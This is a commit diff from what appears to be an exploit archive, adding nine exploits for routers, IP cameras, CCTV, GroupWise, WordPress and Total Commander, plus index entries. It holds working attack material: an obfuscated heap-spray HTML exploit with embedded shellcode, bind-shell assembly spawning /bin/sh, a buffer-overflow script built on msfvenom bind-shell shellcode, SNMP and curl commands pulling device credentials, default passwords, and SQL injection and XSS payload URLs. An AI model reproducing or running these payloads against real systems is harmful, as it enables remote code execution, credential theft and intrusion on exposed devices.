DB: 2015-09-21
9 new exploits
This commit is contained in:
parent
828e9ae3d0
commit
c6421d54c9
11 changed files with 640 additions and 2 deletions
13
files.csv
13
files.csv
|
@ -472,7 +472,7 @@ id,file,description,date,author,platform,type,port
|
|||
609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
|
||||
611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
|
||||
612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
|
||||
616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit (1)",2004-11-07,class101,windows,remote,80
|
||||
616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
|
||||
618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
|
||||
619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
|
||||
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
|
||||
|
@ -488,7 +488,7 @@ id,file,description,date,author,platform,type,port
|
|||
631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
|
||||
634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
|
||||
635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
|
||||
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (2)",2004-11-16,NoPh0BiA,windows,remote,80
|
||||
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80
|
||||
637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
|
||||
638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
|
||||
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
|
||||
|
@ -34535,3 +34535,12 @@ id,file,description,date,author,platform,type,port
|
|||
38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
|
||||
38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
|
||||
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
|
||||
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
|
||||
38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
|
||||
38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
|
||||
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
|
||||
38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
|
||||
38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
|
||||
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
|
||||
38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
|
||||
38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
76
platforms/hardware/remote/38242.txt
Executable file
76
platforms/hardware/remote/38242.txt
Executable file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
|
||||
[MODEL: DWG849] Cable Modem Gateway
|
||||
# Google Dork: n/a
|
||||
# Date: 09/18/2015
|
||||
# Exploit Author: Matt Dunlap
|
||||
# Vendor Homepage:
|
||||
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
|
||||
# Software Link: n/a
|
||||
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
|
||||
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
|
||||
# Tested on: Ubuntu 14.04.3
|
||||
# CVE : Not reported to vendor (yet)
|
||||
|
||||
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
|
||||
Cable Modem Gateway
|
||||
|
||||
Affected Product:
|
||||
|
||||
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
|
||||
|
||||
NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
|
||||
the remote administration enabled (no web interface, no telnet)
|
||||
|
||||
Severity Rating:
|
||||
|
||||
Important
|
||||
|
||||
Impact:
|
||||
|
||||
Username and password for the user interface as well as wireless network
|
||||
keys can be disclosed through SNMP.
|
||||
|
||||
At the time of posting this there are 61,505 results on Shodan for this
|
||||
model.
|
||||
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
|
||||
|
||||
The default password of 4GIt3M has been set on every unit I’ve tested so far
|
||||
|
||||
Description:
|
||||
|
||||
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
|
||||
specifications include SNMP v2 & v3 under Network Management. The
|
||||
management information bases (MIBs) of various device subsystems on the
|
||||
DWG849 allows local\remote network users to discover user interface
|
||||
credentials and wireless network key values through simple SNMP requests
|
||||
for the value of these variables. Given the security authentication in
|
||||
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
|
||||
risk that the values can be disclosed through SNMP using the default
|
||||
read-only community “private”.
|
||||
|
||||
Object Identifiers (OIDs):
|
||||
|
||||
Make, Model, Software Version:
|
||||
1.3.6.1.2.1.1.1.0
|
||||
1.3.6.1.2.1.1.3.0
|
||||
|
||||
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
|
||||
|
||||
SSID and KEY
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
|
||||
|
||||
Guest Network OIDs
|
||||
Other OIDs of interest include
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
|
||||
|
||||
[POC]
|
||||
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
|
||||
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
|
||||
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
|
||||
|
||||
This issue has not been reported to the vendor.
|
148
platforms/hardware/webapps/38245.txt
Executable file
148
platforms/hardware/webapps/38245.txt
Executable file
|
@ -0,0 +1,148 @@
|
|||
1. *Advisory Information*
|
||||
|
||||
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
|
||||
Date published: 2015-09-19
|
||||
Date of last update: 2015-09-19
|
||||
Vendors contacted: ADH-Web
|
||||
Author: Glaysson dos Santos
|
||||
Release mode: User release
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Information Exposure [CWE-200]
|
||||
Impact: Security bypass
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
CVE Name:
|
||||
|
||||
3. *Vulnerabilities*
|
||||
|
||||
3.1 ADH-Web Server IP-Cameras Improper Access Restrictions
|
||||
|
||||
3.1.1 Description
|
||||
|
||||
Due to improper access restriction the ADH-Web (item 4) device [1] allows a
|
||||
remote attacker to browse and access arbitrary files from the following
|
||||
directorie '/hdd0/logs'. you can also get numerous information
|
||||
(important for a fingerprint step) via the parameter "variable" in
|
||||
variable.cgi script.
|
||||
|
||||
3.1.2 Vulnerability Details
|
||||
|
||||
Usually this directory can be protected against
|
||||
unauthenticated access (401 Unauthorized), though, it can access all files
|
||||
directly without requiring authentication.As in the statement below:
|
||||
|
||||
[401]
|
||||
. 'http://<target_ip>/hdd0/logs'
|
||||
[200]
|
||||
. 'http://<target_ip>/hdd0/logs/log.txt'
|
||||
|
||||
Most common logfiles:
|
||||
|
||||
. 'bak.txt
|
||||
. 'connect.txt'
|
||||
. 'log.txt'
|
||||
. 'seclog.log'
|
||||
. 'startup.txt'
|
||||
. 'DBGLOG.TXT'
|
||||
. 'access.txt'
|
||||
. 'security.txt'
|
||||
|
||||
3.1.3 Impact
|
||||
|
||||
This could allow a remote attacker to obtain valuable information such as
|
||||
access credentials, Network configuration and other sensitive information
|
||||
in plain text.
|
||||
|
||||
Another problem identified is an information exposure via the parameter
|
||||
"variable" in variable.cgi script. Knowing some variables can extract a
|
||||
reasonable amount of information. For exemplo:
|
||||
|
||||
* DNS
|
||||
. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'
|
||||
|
||||
* ftp master ftp console credenthials ((the development team said that this
|
||||
credential is not used, then why does it exist?):
|
||||
. '
|
||||
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
|
||||
'
|
||||
. '
|
||||
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
|
||||
'
|
||||
|
||||
(although the vast majority of servers have ftp / telnet with anonymous
|
||||
access allowed.)
|
||||
|
||||
* alarms
|
||||
. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
|
||||
* camconfig
|
||||
. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
|
||||
(includes, but is not limited to) There are a lot of variables [an audit
|
||||
tool is on the way].
|
||||
|
||||
This servers also sends credentials (and other sensitive data) via GET
|
||||
parameters
|
||||
This is poor practice as the URL is liable to be logged in any number of
|
||||
places
|
||||
between the customer and the camera. The credentials should be passed in
|
||||
the body
|
||||
of a POST request (under SSL of course, here is not the case). .
|
||||
(Is possible to create, edit and delete users and other configurations in
|
||||
this way, dangerous)
|
||||
|
||||
4. *Vulnerable Products and Packages*
|
||||
|
||||
. The following products are affected:
|
||||
- SD Advanced Closed IPTV
|
||||
- SD Advanced
|
||||
- EcoSense
|
||||
- Digital Sprite 2
|
||||
Other products/models are probably affected too, but they I not checked.
|
||||
|
||||
5. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
The vendor found that some things are not vulnerabilities (sensitive
|
||||
information via GET, for example)
|
||||
and others are useless (hardcoded credentials) and others are not yet so
|
||||
critical (access to server logs).
|
||||
I think that at least this information can assist during an intrusion test,
|
||||
as will be shown soon.
|
||||
|
||||
6. *Credits*
|
||||
This vulnerability was discovered by Glaysson dos Santos.
|
||||
|
||||
7. *Report Timeline*
|
||||
|
||||
. 2015-08-31:
|
||||
Vendor has been notified about the vulnerabilities (without details yet).
|
||||
|
||||
. 2015-09-01:
|
||||
Vendor acknowledges the receipt of the email and asks for technical
|
||||
details.
|
||||
|
||||
. 2013-09-01:
|
||||
A email with technical details is sent to vendor.
|
||||
|
||||
. 2013-09-11:
|
||||
Still no response, another email was sent to the Vendor requesting any
|
||||
opinion on the reported problems.
|
||||
|
||||
the following points were highlighted in this email:
|
||||
* 1. No unauthenticated access [No web pages/URL parameters on the cameras
|
||||
should be accessible without credentials.]
|
||||
* 2. Credentials (and other sensitive data) via GET parameters
|
||||
* 4. Use of hard-coded password
|
||||
* 3. no SSL
|
||||
|
||||
. 2013-09-11:
|
||||
The vendor reported that the matter was passed on to the team developed
|
||||
and that it would contact me the following week (2015-09-14).
|
||||
|
||||
. 2013-09-14:
|
||||
The development team responded by passing its consideration of the points
|
||||
and
|
||||
reported in accordance with this response the impact of these
|
||||
vulnerabilities
|
||||
is low and are no longer available unauthenticated using recent software
|
||||
release (version 10212).
|
11
platforms/multiple/dos/38249.txt
Executable file
11
platforms/multiple/dos/38249.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/57602/info
|
||||
|
||||
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
|
||||
|
||||
Attackers can exploit these issues to cause denial-of-service conditions.
|
||||
|
||||
MiniUPnP versions prior to 1.4 are vulnerable.
|
||||
|
||||
M-SEARCH * HTTP/1.1
|
||||
Host:239.255.255.250:1900
|
||||
ST:uuid:schemas:device:MX:3< no CRLF >
|
7
platforms/multiple/remote/38248.txt
Executable file
7
platforms/multiple/remote/38248.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/57579/info
|
||||
|
||||
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
|
||||
|
||||
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
|
||||
|
||||
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
|
248
platforms/multiple/remote/38250.html
Executable file
248
platforms/multiple/remote/38250.html
Executable file
|
@ -0,0 +1,248 @@
|
|||
source: http://www.securityfocus.com/bid/57657/info
|
||||
|
||||
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
|
||||
|
||||
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
|
||||
|
||||
The following versions are vulnerable:
|
||||
|
||||
Versions prior to 8.0.3 Hot Patch 2
|
||||
Versions prior to GroupWise 2012 SP1 Hot Patch 1
|
||||
|
||||
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
|
||||
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
|
||||
<html>
|
||||
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
|
||||
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
|
||||
<script language='javascript'>
|
||||
|
||||
function GyGguPonxZoADbtgXPS() {
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
|
||||
|
||||
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
|
||||
this.heapBase = (heapBase ? heapBase : 0x150000);
|
||||
this.KJZFzfumaV = "AAAA";
|
||||
|
||||
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
|
||||
this.KJZFzfumaV += this.KJZFzfumaV;
|
||||
}
|
||||
this.mem = new Array();
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
|
||||
void(Math.atan2(0xbabe, msg));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
|
||||
|
||||
if (enable == true)
|
||||
void(Math.atan(0xbabe));
|
||||
else
|
||||
void(Math.asin(0xbabe));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
|
||||
void(Math.acos(0xbabe));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
|
||||
if (len > this.KJZFzfumaV.length)
|
||||
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
|
||||
|
||||
return this.KJZFzfumaV.substr(0, len);
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
|
||||
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
|
||||
throw "Round argument cannot be 0";
|
||||
|
||||
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
|
||||
{
|
||||
var digits = "0123456789ABCDEF";
|
||||
|
||||
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
|
||||
|
||||
while (num > 0xF) {
|
||||
num = num >>> 4;
|
||||
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
|
||||
}
|
||||
|
||||
var width = (width ? width : 0);
|
||||
|
||||
while (beTBwoiJGBBhwyZg.length < width)
|
||||
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
|
||||
|
||||
return beTBwoiJGBBhwyZg;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
|
||||
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
if (this.mem[tag] === undefined)
|
||||
this.mem[tag] = new Array();
|
||||
|
||||
if (typeof arg == "string" || arg instanceof String) {
|
||||
this.mem[tag].push(arg.substr(0, arg.length));
|
||||
}
|
||||
else {
|
||||
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
|
||||
}
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
|
||||
|
||||
delete this.mem[tag];
|
||||
CollectGarbage();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
|
||||
|
||||
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
|
||||
|
||||
this.SWc("oleaut32");
|
||||
|
||||
for (var i = 0; i < 6; i++) {
|
||||
this.nPdkLCpaz(32, "oleaut32");
|
||||
this.nPdkLCpaz(64, "oleaut32");
|
||||
this.nPdkLCpaz(256, "oleaut32");
|
||||
this.nPdkLCpaz(32768, "oleaut32");
|
||||
}
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if (size == 32 || size == 64 || size == 256 || size == 32768)
|
||||
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
|
||||
this.nPdkLCpaz(arg, tag);
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
|
||||
this.SWc(tag);
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
|
||||
|
||||
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
|
||||
CollectGarbage();
|
||||
|
||||
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
|
||||
|
||||
var count = (count ? count : 1);
|
||||
|
||||
for (var i = 0; i < count; i++) {
|
||||
this.uYiBaSLpjlOJJdhFAb(arg);
|
||||
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
|
||||
}
|
||||
this.uYiBaSLpjlOJJdhFAb(arg);
|
||||
|
||||
this.K("ZsJjplNR");
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
|
||||
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
|
||||
if (size+8 >= 1024)
|
||||
throw("Maximum WbjLbPsZ block size is 1008 bytes");
|
||||
|
||||
var count = (count ? count : 1);
|
||||
|
||||
for (var i = 0; i < count; i++)
|
||||
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
|
||||
|
||||
this.K("WbjLbPsZ");
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
|
||||
{
|
||||
var size;
|
||||
if (typeof arg == "string" || arg instanceof String)
|
||||
size = 4 + arg.length*2 + 2;
|
||||
else
|
||||
size = arg;
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Allocation size " + size + " must be a multiple of 16";
|
||||
|
||||
if (size+8 >= 1024)
|
||||
throw("Maximum WbjLbPsZ block size is 1008 bytes");
|
||||
|
||||
return this.heapBase + 0x688 + ((size+8)/8)*48;
|
||||
}
|
||||
|
||||
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
|
||||
|
||||
var size = (size ? size : 1008);
|
||||
if ((size & 0xf) != 0)
|
||||
throw "Vtable size " + size + " must be a multiple of 16";
|
||||
|
||||
if (shellcode.length*2 > size-138)
|
||||
throw("Maximum shellcode length is " + (size-138) + " bytes");
|
||||
|
||||
var udIUhjCc = unescape("%u9090%u7ceb")
|
||||
|
||||
for (var i = 0; i < 124/4; i++)
|
||||
udIUhjCc += this.RBRfbU(jmpecx);
|
||||
|
||||
udIUhjCc += unescape("%u0028%u0028") +
|
||||
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
|
||||
|
||||
return udIUhjCc;
|
||||
}
|
||||
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
|
||||
var payload2 = unescape(
|
||||
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
|
||||
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
|
||||
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
|
||||
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
|
||||
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
|
||||
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
|
||||
"");
|
||||
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
|
||||
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
|
||||
|
||||
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
|
||||
|
||||
offset_length = 0x5F6;
|
||||
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
|
||||
|
||||
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
|
||||
var block = shellcode.substring(2, 0x40000 - 0x21);
|
||||
for (var i=0; i < 250; i++) {
|
||||
heap_obj.uYiBaSLpjlOJJdhFAb(block);
|
||||
}
|
||||
ctrl.InvokeContact(202116108)
|
||||
</script>
|
||||
</html>
|
|
@ -65,6 +65,21 @@ start:
|
|||
add r12b, 0x3c ;RAX = 0x000000000200005a dup2
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
inc rsi
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
xor rsi,rsi ;zero out RSI
|
||||
push rsi ;push NULL on stack
|
||||
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
|
||||
push rdi ;push rdi to the stack
|
||||
mov rdi, rsp ;store RSP (points to the command string) in RDI
|
||||
xor rdx, rdx ;zero out RDX
|
||||
|
||||
sub r12b, 0x1f ;RAX = 0x000000000200003b execve
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall ;trigger syscall
|
||||
|
||||
/*
|
||||
$ nasm -f bin bind-shellcode.asm
|
||||
|
|
9
platforms/php/webapps/38246.txt
Executable file
9
platforms/php/webapps/38246.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/57564/info
|
||||
|
||||
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/forum/icart.php?do=editproduct&productid=19§ion='
|
9
platforms/php/webapps/38251.txt
Executable file
9
platforms/php/webapps/38251.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/57664/info
|
||||
|
||||
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
|
||||
|
||||
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
|
51
platforms/windows/local/38243.py
Executable file
51
platforms/windows/local/38243.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
|
||||
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
|
||||
# Credits: Un_N0n
|
||||
# Date of Testing: 19th September 2015
|
||||
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
|
||||
# Tested On : Windows 10
|
||||
# Steps to Exploit
|
||||
# Step 1: Execute this python script
|
||||
# Step 2: This script will create a file called time.txt
|
||||
# Step 3: Copy the contents of time.txt file
|
||||
# Step 4: Now open Total Commander 8.52
|
||||
# Step 5: Go To file > Change Attributes.
|
||||
# Step 6: In time field paste the contents of time.txt
|
||||
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
|
||||
file = open('time.txt' , 'wb');
|
||||
|
||||
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
|
||||
|
||||
